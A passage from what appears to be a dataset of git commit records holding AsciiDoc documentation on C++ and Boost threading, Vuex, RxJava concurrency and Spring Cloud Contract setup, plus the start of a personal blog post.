std::cerr\n \/\/ 3) for the condition variable cv\nint i = 0;\n \nvoid waits()\n{\n std::unique_lock<std::mutex> lk(cv_m);\n std::cerr << \"Waiting... \\n\";\n cv.wait(lk, []{return i == 1;});\n std::cerr << \"...finished waiting. i == 1\\n\";\n}\n \nvoid signals()\n{\n {\n std::lock_guard<std::mutex> lk(cv_m);\n i = 1;\n std::cerr << \"Notifying again...\\n\";\n }\n cv.notify_all();\n}\n----\n\n*All* the threads executing `waits` will be unblocked by the `notify_all`.\nThe mutex is used by the signalling thread when it touches the condition.\nIt is also used by the waiting thread. 
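\n\nFor reference, the two-argument `cv.wait(lk, pred)` overload used above behaves like the following loop (a sketch using the same variables as the code above):\n\n[source,c++]\n----\nwhile (!pred())\n cv.wait(lk); \/\/ releases cv_m while blocked, re-acquires it on wake-up\n----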
\n\nIMPORTANT: The mutex is unlocked at the start of the call to the `wait` function.\n\n== future, promise\n\n* full version\nYou can call `get` on a future\nYou call `set` on a promise\n\nYou can retrieve the future associated with a promise\n\n[source,c++]\n----\nvoid accumulate(boost::promise<int> &p)\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n p.set_value(sum);\n}\n\nint main()\n{\n boost::promise<int> p;\n boost::future<int> f = p.get_future();\n boost::thread t{accumulate, std::ref(p)};\n std::cout << f.get() << '\\n';\n}\n----\n\n\n* simplified version (with `async`)\n\n[source,c++]\n----\nint accumulate()\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n return sum;\n}\n\nint main()\n{\n boost::future<int> f = boost::async(accumulate);\n std::cout << f.get() << '\\n';\n}\n----\n","old_contents":"= multithreading\n\n== threads, groups\n----\nvoid change_count(){]\n\nboost::thread_group threads;\nfor (int i=0; i < num_threads; ++i)\n threads.create_thread(&change_count);\n\n threads.join_all();\n}\n----\n\n== synchronization (locks)\n\n* locks guard (RAII, inutile d'appeler lock\/unlock)\n\n[source,c++]\n----\nfor (int i = 0; i < 5; ++i)\n{\n wait(1);\n boost::lock_guard<boost::mutex> lock{mutex};\n std::cout << \"Thread \" << get_id() << \": \" << i << std::endl;\n}\n\n* shared_mutex (lock par shared_lock ou unique lock)\n----\n\n[source,c++]\n----\nvoid write_acess()\n{\n boost::unique_lock<boost::mutex> lock{mutex};\n}\n \nvoid read_accesst()\n{\n for (int i = 0; i < 3; ++i)\n {\n boost::shared_lock<boost::shared_mutex> lock{mutex};\n std::cout << random_numbers.back() << '\\n';\n }\n}\n----\n\n== conditions\n\n[source,c++]\n----\nstd::condition_variable cv;\nstd::mutex cv_m; \/\/ This mutex is used for three purposes:\n \/\/ 1) to synchronize accesses to i\n \/\/ 2) to synchronize accesses to std::cerr\n \/\/ 3) for the condition variable cv\nint i = 0;\n \nvoid waits()\n{\n std::unique_lock<std::mutex> lk(cv_m);\n std::cerr << \"Waiting... \\n\";\n cv.wait(lk, []{return i == 1;});\n std::cerr << \"...finished waiting. i == 1\\n\";\n}\n \nvoid signals()\n{\n {\n std::lock_guard<std::mutex> lk(cv_m);\n i = 1;\n std::cerr << \"Notifying again...\\n\";\n }\n cv.notify_all();\n}\n----\n\n*Tous* les threads qui ex\u00e9cutent waits vont \u00eatre d\u00e9bloqu\u00e9s par le notify_all\nLe mutex est utilis\u00e9 par le thread signalant lorsqu'il touche \u00e0 la condition\nIl est aussi utilis\u00e9 par le thread en attente. 
\n\nIMPORTANT: Il est unlock\u00e9 au d\u00e9but de l'appel de la fonction wait \n\n== future, promise\n\n* version compl\u00e8te\nOn peut faire un get sur un futur\nOn fait un set sur une promise\n\nOn peut r\u00e9cup\u00e9rer le futur associ\u00e9e d'une promise\n\n----\nvoid accumulate(boost::promise<int> &p)\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n p.set_value(sum);\n}\n\nint main()\n{\n boost::promise<int> p;\n boost::future<int> f = p.get_future();\n boost::thread t{accumulate, std::ref(p)};\n std::cout << f.get() << '\\n';\n}\n----\n\n\n* version simplifi\u00e9e (avec async)\n----\nint accumulate()\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n return sum;\n}\n\nint main()\n{\n boost::future<int> f = boost::async(accumulate);\n std::cout << f.get() << '\\n';\n}\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e17c75e050bde8841e3e6824755e8a264a05befe","subject":"Update 2017-06-18-Vuex-Quick-Ref.adoc","message":"Update 2017-06-18-Vuex-Quick-Ref.adoc","repos":"mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io","old_file":"_posts\/2017-06-18-Vuex-Quick-Ref.adoc","new_file":"_posts\/2017-06-18-Vuex-Quick-Ref.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Vuex Quick Ref\n:published_at: 2017-06-18\n:hp-tags: JavaScript, vuejs, vuex\n\n## Store\n\n- Instantiated with ```Vuex.Store(options)``` constructor\n- Injected into child components as ```this.$store``` to enable easy access\n- Properties of ```options``` object are described below.\n \n### state\n\n- ```state``` is the reactive data stored in a vuex ```store``` and very similar to the ```data``` property in options for component constructor.\n- ```state``` variables are usually exposed as ```computed``` properties to enable easy access within components.\n- ```mapState```\n - A utility function to mix & expose ```state``` variables as ```computed``` properties in components.\n - Imported as ```import { mapState } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapState({})```\n\n### getters\n\n- ```getters``` is for vuex ```store``` what ```computed``` is for components.\n- ```getters``` are also exposed through ```computed``` properties to enable easy access within components.\n- Signature of **getter** is ```getterName: function(state, getters) { \/** ... *\/ }```\n- Arguments can also be passed to getters by returning a function. This is particularly useful when querying an array in the store is required.\n- ```mapGetters```\n - A utility function to mix & expose ```getters``` in ```computed``` within components.\n - Imported as ```import { mapGetters } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapGetters({})```
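\n\nA minimal component sketch tying these together (assumes a store with a ```todos``` state array and a ```doneTodos``` getter; the names are illustrative):\n\n```js\nimport { mapState, mapGetters } from 'vuex'\n\nexport default {\n computed: {\n \/\/ local computed properties can sit alongside the mapped ones\n ...mapState(['todos']),\n ...mapGetters(['doneTodos'])\n }\n}\n```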
\n\n### mutations\n\n- ```mutations``` is an object to define **mutator** methods in vuex ```store``` which are allowed & responsible to modify store's ```state```.\n- It is not permissible to modify ```state``` directly in vuex stores, so **mutators** are needed.\n- Signature of **mutator** is ```mutatorName: function(state, [payload]) { \/** ... *\/ }```\n- To invoke a **mutator**, you need to call ```store.commit(mutation, [payload])``` with its ```name``` and its optional ```payload```.\n- ```mutations``` must be synchronous.\n- ```mapMutations```\n - A utility function to mix & expose ```mutations``` as component ```methods``` that invoke the respective mutation via ```store.commit```.\n - Imported as ```import { mapMutations } from 'vuex'```\n - Returns object, so it can be used to merge with local ```methods``` option of components using [object spread](#) syntax, i.e. ```...mapMutations({})```\n \n### actions\n\n- Actions are similar to mutations, the differences being that:\n - Instead of mutating the state, actions commit mutations.\n - Actions can contain arbitrary asynchronous operations.\n- Action handlers receive a ```context``` object which exposes the same set of methods\/properties on the ```store``` instance, so you can call ```context.commit``` to commit a mutation, or access the ```state``` and ```getters``` via ```context.state``` and ```context.getters``` respectively.\n- Actions are triggered with the ```store.dispatch(actionName, payload)``` method.
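\n\nA small sketch of an action committing a mutation asynchronously (the names are illustrative):\n\n```js\nconst store = new Vuex.Store({\n state: { count: 0 },\n mutations: {\n increment (state) { state.count++ }\n },\n actions: {\n \/\/ commit the mutation once the async operation finishes\n incrementAsync ({ commit }) {\n setTimeout(() => commit('increment'), 1000)\n }\n }\n})\n\nstore.dispatch('incrementAsync')\n```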
\n\n","old_contents":"# Vuex Quick Ref\n\n## Store\n\n- Instanciated with ```Vuex.Store(options)``` constructor\n- Injected into child components as ```this.$store``` to enable easy access\n- Properties of ```options``` object are described below.\n \n### state\n\n- ```state``` is the reactive data stored into a vuex ```store``` and very similar to the ```data``` property in options for component constructor.\n- ```state``` variables are usually exposed as ```computed``` properties to enable easy access within components.\n- ```mapState```\n - A utility function to mix & expose ```state``` variables as ```computed``` properties in components.\n - Imported as ```import { mapState } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapState({})```\n\n### getters\n\n- ```getters``` is for vuex ```store``` what ```computed``` is for components.\n- ```getters``` are also exposed through ```computed``` properties to enable easy access within components.\n- Signature of **getter** is ```getterName: function(state, getters) { \/** ... *\/ }```\n- Arguments can also be passed to getters by returning a function. This is particularly useful when querying an array in the store is required.\n- ```mapGetters```\n - A utility function to mix & expose ```getters``` in ```computed``` within components.\n - Imported as ```import { mapGetters } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapGetters({})```\n\n### mutations\n\n- ```mutations``` is an object to define **mutator** methods in vuex ```store``` which are allowed & responsible to modify store's ```state```.\n- It is not permissible to modify ```state``` directly in vuex stores, so **mutators** are needed.\n- Signature of **mutator** is ```mutatorName: function(state, [payload]) { \/** ... *\/ }```\n- To invoke a **mutator**, you need to call ```store.commit(mutation, [payload])``` with its ```name``` and it's optional ```payload```.\n- ```mutations``` must be synchronous.\n- ```mapMutations```\n - A utility function to mix & expose ```mutations``` as component ```methods``` that invokes respective mutation via ```store.commit```.\n - Imported as ```import { mapMutations } from 'vuex'```\n - Returns object, so it can be used to merge with local ```methods``` option of components using [object spread](#) syntax, i.e. ```...mapMutations({})```\n \n### actions\n\n- Actions are similar to mutations, the differences being that:\n - Instead of mutating the state, actions commit mutations.\n - Actions can contain arbitrary asynchronous operations.\n- Action handlers receive a ```context``` object which exposes the same set of methods\/properties on the ```store``` instance, so you can call ```context.commit``` to commit a mutation, or access the ```state``` and ```getters``` via ```context.state``` and ```context.getters``` respectively.\n- Actions are triggered with the ```store.dispatch(actionName, payload)``` method.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a4f0816b4eb6f06ee5c8dea3d38fc3b547e66e6","subject":"improved docs","message":"improved docs\n","repos":"Petikoch\/rxjava_examples","old_file":"docs\/02_threading_and_parallelism.adoc","new_file":"docs\/02_threading_and_parallelism.adoc","new_contents":"== Threading and Parallelism with RxJava and Java 8\n\nProbably you also had a difficult start concerning RxJava and threading like http:\/\/www.grahamlea.com\/2014\/07\/rxjava-threading-examples[Graham Lea did].\n\nI had.\n\nWhy did I? I made some false assumptions regarding threading instead of properly learning \"stuff\" first using e.g. http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\nThe main point about Rx and parallelism \/ concurrency is probably noted here http:\/\/www.introtorx.com\/Content\/v1.0.10621.0 and states\n\na) _\"Rx is single-threaded by default\"_\n\nand\n\nb) _\"While Rx has concurrency features, these should not be mistaken for a concurrency framework. Rx is designed for querying data, and as discussed in the first chapter, parallel computations or composition of asynchronous methods is more appropriate for other frameworks.\"_\n\nI would sum this up to:\n\nRx is created mainly for \"clients\" (client applications like apps, desktop gui applications, ...) where\nyou have typically one thread from the GUI and you would like to \"spin off\" several background tasks (in parallel) when an event like submitting a form happens,\ncombine these asynchronously returning background task-results to one result which you display in the GUI. It's not primarily made for \"servers\",\ne.g. to handle concurrent HTTP requests in a webserver. But you can use it to implement \"servers\", if you know \"how\".\n\nSee also https:\/\/github.com\/ReactiveX\/RxJava\/issues\/1673 and the section about schedulers in http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\n
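For orientation before the examples below, a tiny fan-out sketch in RxJava 1.x (the stream contents are made up and are not from the example sources):\n\n[source,java]\n----\nimport rx.Observable;\nimport rx.schedulers.Schedulers;\n\npublic class FanOutSketch {\n public static void main(String[] args) {\n Observable.just(\"burger\", \"fries\", \"shake\")\n .flatMap(item -> Observable.just(item)\n .subscribeOn(Schedulers.io()) \/\/ prepare each item on a background thread\n .map(i -> i + \" ready\"))\n .toBlocking()\n .forEach(System.out::println);\n }\n}\n----\n\n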
=== OneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive.java[]\n\nThink of a McDrive with one lane and very few customers arriving. The one lane is either free or there is one customer.\nEach customer always orders the same three \"things\", which you can prepare with 3 workers in the background \"in parallel\".\n\n* Parallelism in a logical sense\n* Based on the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator (Note: @Beta annotated in RxJava 1.0.14)\n\nIn this example there is no need for backpressure, since the customers arrive \"slowly\" and the McDrive can handle them in time.\n\nBut what happens if you increase the number of arriving customers (=decrease seconds in interval operator)?\nCurrently, the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator implementation in RxJava seems to \"buffer\" on backpressure.\n\n=== OneLaneMcDrive2\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive2.java[]\n\nAn implementation of OneLaneMcDrive without the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\nInstead we use a PublishSubject instance to \"communicate the result to the outside\" and use an AtomicBoolean instance to limit\nthe number of concurrent customers to one.\n\nYou immediately understand now the \"power\" of the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\n\n=== TwoLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/TwoLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with two lanes. There are still few customers arriving concurrently. Each lane\nis either free or has at most one customer. At any time we have between 0 and 2 customers concurrently.\n\n* Parallelism in an execution sense: We can handle two customers at the same time\n* Parallelism in a logical sense: like OneLaneMcDrive\n\nThere is also no need for backpressure, since the customers arrive \"slowly\" and the McDrive can handle them in time.\n\n=== JammedOneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/JammedOneLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with more customers arriving. The McDrive can't handle all of them \"just in time\",\nso a wait line (queue) builds up. The longer the example runs, the longer the wait line becomes.\n\nWe need some kind of backpressure: we choose buffering (queueing) and get a \"jam\".\n\n=== InfiniteLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/InfiniteLaneMcDrive.java[]\n\nNow, we have an \"infinite\" number of lanes. The number of lanes grows to the point where we have\nenough lanes to handle all the arriving customers \"just in time\".\n\nWe output the number of lanes (=number of concurrently handled customers).\n\n=== SingleThreadedByDefault\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/SingleThreadedByDefault.java[]\n\nLet's come back from the food to the technical details. As initially said, RxJava is _\"single threaded by default\"_.\nAlthough you can offload the work from one thread to another (using Schedulers), the program flow then switches\nfrom one thread to another *single* thread, not to a pool of threads. Your sourcecode (e.g. your observer) is always called by\nonly *one* and the *same* thread.\n\nSo, to make it more clear: _\"your sourcecode is always called by the same single thread\"_.\n\nBenefit? 
You don't have to implement thread-safe code, which is hard.","old_contents":"== Threading and Parallelism with RxJava and Java 8\n\nProbably you also had a difficult start concerning RxJava and threading like http:\/\/www.grahamlea.com\/2014\/07\/rxjava-threading-examples[Graham Lea did].\n\nI had.\n\nWhy did I? I made some false assumptions regarding threading instead of properly learning \"stuff\" first using e.g. http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\nThe main point about Rx and parallelsim \/ concurrency is probably noted here http:\/\/www.introtorx.com\/Content\/v1.0.10621.0 and states\na) _\"Rx is single-threaded by default\"_\nand b) _\"While Rx has concurrency features, these should not be mistaken for a concurrency framework. Rx is designed for querying data, and as discussed in the first chapter, parallel computations or composition of asynchronous methods is more appropriate for other frameworks.\"_\n\nI would sum this up to:\n\nRx is created mainly for \"clients\" (client applications like apps, desktop gui applications, ...) where\nyou have typically one thread from the GUI and you would like to \"spin off\" several background tasks (in parallel) when an event like submitting a form happens,\ncombine these asynchronously returning background tasks results to one result which you display in the GUI. It's not primarly made for \"servers\",\ne.g. to handle concurrent HTTP requests in a webserver. But you can use it to do implement \"servers\", if you know \"how\".\n\nSee also https:\/\/github.com\/ReactiveX\/RxJava\/issues\/1673 and the section about schedulers in http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\n=== OneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive.java[]\n\nThink of a McDrive with one lane and very few customers arriving. The one lane is either free or there is one customer.\nEach customer orders always the same three \"things\", which you can prepare with 3 workers in the background \"in parallel\".\n\n* Parallelism in a logical sense\n* Based on the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator (Note: @Beta annotated in RxJava 1.0.14)\n\nIn this example there is no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\nBut what happens if you increase the number of arriving customers (=decrease seconds in interval operator)?\nCurrently, the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator implementation in RxJava seems to \"buffer\" on backpressure.\n\n=== OneLaneMcDrive2\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive2.java[]\n\nAn Implementation of OneLaneMcDrive without the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\nInstead we use a PublishSubject instance to \"communicate the result to the outside\" and use an AtomicBoolean instance to limit\nthe number of concurrent customers to one.\n\nYou immediately understand now the \"power\" of the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\n\n=== TwoLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/TwoLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with two lanes. There are still few customers arriving concurrently. Each of the lane\nis either free or there is maximum one customer in the lane. 
We have at each time between 0 and 2 customers concurrently.\n\n* Parallelism in a execution sense: We can handle two customers at the same time\n* Parallelism in a logical sense: like OneLaneMcDrive\n\nThere is also no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\n=== JammedOneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/JammedOneLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with more customers arriving. The McDrive can't handle all of them \"just in time\",\nso a wait line (queue) builds up. The longer the example runs, the longer the wait line becomes.\n\nWe need some kind of backpressure: we choose buffering (queueing) and get a \"jam\".\n\n=== InfiniteLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/InfiniteLaneMcDrive.java[]\n\nNow, we have an \"infinite\" number of lanes. The number of lanes grows to the point when we have\nenough lanes to handle all the arriving customers \"just in time\".\n\nWe output the numer of lanes (=number of concurrently handled customers).\n\n=== SingleThreadedByDefault\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/SingleThreadedByDefault.java[]\n\nLet's come back from the food to the technical details. As initially said, RxJava is _\"single threaded by default\"_.\nAlthough you can offload the work from one thread to an other (using Schedulers), the program flow then is switching\nfrom one thread to another *one* thread and not to a pool of threads. Your sourcecode (e.g. your observer) is always called by\nonly *one* and the *same* thread.\n\nSo, to make it more clear: _\"your sourcecode is always called by the same single thread\"_.\n\nBenefit? You don't have to implement thread-safe code, which is hard.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ba46219cc6ebbac186433cc4242e8c75d3b4a49","subject":"Update title style. (#1364)","message":"Update title style. (#1364)\n\nFixes #1349","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/sagan-boot.adoc","new_file":"docs\/src\/main\/asciidoc\/sagan-boot.adoc","new_contents":"== On the Producer Side\n\nTo start working with Spring Cloud Contract, you can add files with REST or messaging contracts expressed in either Groovy DSL or YAML to the contracts directory, which is set by the contractsDslDir property. By default, it is $rootDir\/src\/test\/resources\/contracts.\n\nThen you can add the Spring Cloud Contract Verifier dependency and plugin to your build file, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-verifier<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins portion of the file:\n\n```xml\n<plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n<\/plugin>\n```\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application compliance with the added contracts. 
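For orientation, a minimal contract of the kind these generated tests verify might look as follows (a sketch; the endpoint and payload are made up):\n\n```groovy\norg.springframework.cloud.contract.spec.Contract.make {\n    request {\n        method 'GET'\n        url '\/fraudcheck'\n    }\n    response {\n        status 200\n        body([ fraud: false ])\n        headers {\n            header('Content-Type', 'application\/json')\n        }\n    }\n}\n```\n\n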
By default, the tests get generated under `org.springframework.cloud.contract.verifier.tests`.\n\nAs the implementation of the functionalities described by the contracts is not yet present, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP requests or messages. Also, you must add a base test class for auto-generated tests to the project. This class is extended by all the auto-generated tests, and it should contain all the setup information necessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nThe following example, from pom.xml, shows how to specify the base test class:\n\n```xml\n<build>\n <plugins>\n <plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n <configuration>\n <baseClassForTests>com.example.contractTest.BaseTestClass<\/baseClassForTests> \n <\/configuration>\n <\/plugin>\n <plugin>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n```\n\nINFO: The baseClassForTests element lets you specify your base test class. It must be a child of a configuration element within spring-cloud-contract-maven-plugin.\n\nOnce the implementation and the test base class are in place, the tests pass, and both the application and the stub artifacts are built and installed in the local Maven repository. You can now merge the changes, and you can publish both the application and the stub artifacts in an online repository.\n\n== On the Consumer Side\n\nYou can use Spring Cloud Contract Stub Runner in the integration tests to get a running WireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to Spring Cloud Contract Stub Runner, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-stub-runner<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two ways:\n\nBy checking out the Producer side repository and adding contracts and generating the stubs by running the following commands:\n\n```bash\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n```\n\nThe tests are being skipped because the producer-side contract implementation is not in place yet, so the automatically-generated contract tests fail.\n\nBy getting already-existing producer service stubs from a remote repository. To do so, pass the stub artifact IDs and artifact repository URL as Spring Cloud Contract Stub Runner properties, as the following example shows:\n\n```yml\n stubrunner:\n ids: 'com.example:http-server-dsl:+:stubs:8080'\n repositoryRoot: https:\/\/repo.spring.io\/libs-snapshot\n``` \n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. 
In the annotation, provide the group-id and artifact-id values for Spring Cloud Contract Stub Runner to run the collaborators' stubs for you, as the following example shows:\n\n```java\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n stubsMode = StubRunnerProperties.StubsMode.LOCAL)\npublic class LoanApplicationServiceTests {\n```\n\nUse the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or messages that are expected to be emitted by the collaborator service.\n","old_contents":"== On the Producer Side\n\nTo start working with Spring Cloud Contract, you can add files with REST or messaging contracts expressed in either Groovy DSL or YAML to the contracts directory, which is set by the contractsDslDir property. By default, it is $rootDir\/src\/test\/resources\/contracts.\n\nThen you can add the Spring Cloud Contract Verifier dependency and plugin to your build file, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-verifier<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins portion of the file:\n\n```xml\n<plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n<\/plugin>\n```\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application compliance with the added contracts. By default, the tests get generated under `org.springframework.cloud.contract.verifier.tests`.\n\nAs the implementation of the functionalities described by the contracts is not yet present, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP requests or messages. Also, you must add a base test class for auto-generated tests to the project. This class is extended by all the auto-generated tests, and it should contain all the setup information necessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nThe following example, from pom.xml, shows how to specify the base test class:\n\n```xml\n<build>\n <plugins>\n <plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n <configuration>\n <baseClassForTests>com.example.contractTest.BaseTestClass<\/baseClassForTests> \n <\/configuration>\n <\/plugin>\n <plugin>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n```\n\nINFO: The baseClassForTests element lets you specify your base test class. It must be a child of a configuration element within spring-cloud-contract-maven-plugin.\n\nOnce the implementation and the test base class are in place, the tests pass, and both the application and the stub artifacts are built and installed in the local Maven repository. You can now merge the changes, and you can publish both the application and the stub artifacts in an online repository.\n2.2. 
On the Consumer Side\n\nYou can use Spring Cloud Contract Stub Runner in the integration tests to get a running WireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to Spring Cloud Contract Stub Runner, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-stub-runner<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two ways:\n\nBy checking out the Producer side repository and adding contracts and generating the stubs by running the following commands:\n\n```bash\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n```\n\nThe tests are being skipped because the producer-side contract implementation is not in place yet, so the automatically-generated contract tests fail.\n\nBy getting already-existing producer service stubs from a remote repository. To do so, pass the stub artifact IDs and artifact repository URL as Spring Cloud Contract Stub Runner properties, as the following example shows:\n\n```yml\n stubrunner:\n ids: 'com.example:http-server-dsl:+:stubs:8080'\n repositoryRoot: https:\/\/repo.spring.io\/libs-snapshot\n``` \n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the group-id and artifact-id values for Spring Cloud Contract Stub Runner to run the collaborators' stubs for you, as the following example shows:\n\n```java\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n stubsMode = StubRunnerProperties.StubsMode.LOCAL)\npublic class LoanApplicationServiceTests {\n```\n\nUse the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or messages that are expected to be emitted by the collaborator service.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bab0b13dbb2e2b22bd8939e77b0aa0c70d58dc0","subject":"Update 2015-08-23-Define-Extrapolate.adoc","message":"Update 2015-08-23-Define-Extrapolate.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_contents":"= Define Extrapolate\n\nExtrapolate is a blog.\n\nNot a travel blog, or a food blog, or a book\/movie review blog, though these are all things that I enjoy and will likely make cameos in posts here and there. Extrapolate isn't a daily\/weekly\/{insert regular time interval}-ly journal blog either, though it might seem like it at times. \n\nExtrapolate is an ongoing record of the more interesting \"ideas\" that find their ways into my mind. I hesitate to use the word \"ideas\" here because (at least in my personal connotation-dictionary) __ideas__ are discrete, and useful in some capacity. The things I think about are hardly discrete and rarely useful, instead occupying the hazy intellectual territory at the intersection of personal experience and pattern recognition. \n\nThat last bit probably makes zero sense to you, so let me try to explain. 
